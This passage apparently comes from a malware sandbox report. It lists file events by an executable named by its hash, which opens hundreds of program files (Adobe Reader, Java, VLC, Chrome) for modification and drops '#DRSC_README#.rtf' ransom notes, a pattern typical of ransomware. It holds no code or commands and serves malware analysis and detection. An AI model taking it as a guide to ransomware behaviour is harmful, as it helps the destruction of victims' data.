(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-down.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_checkbox_unselected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\th.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\ConnectUnblock.bin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\PYCC.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_rename_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-BoldIt.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_shared_single_filetype.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sendforsignature_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\am_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons_ie8.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HighBeamCardLogo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\comment.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\kinit.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\cs_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\UndoGet.dot 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforsignature.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-disabled_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\nb.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\xjc.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Close2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview_selected.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\close.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\SuspendProtect.temp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\SearchConvert.vssx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-dark-focus_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\sendforsignature.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_bow.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 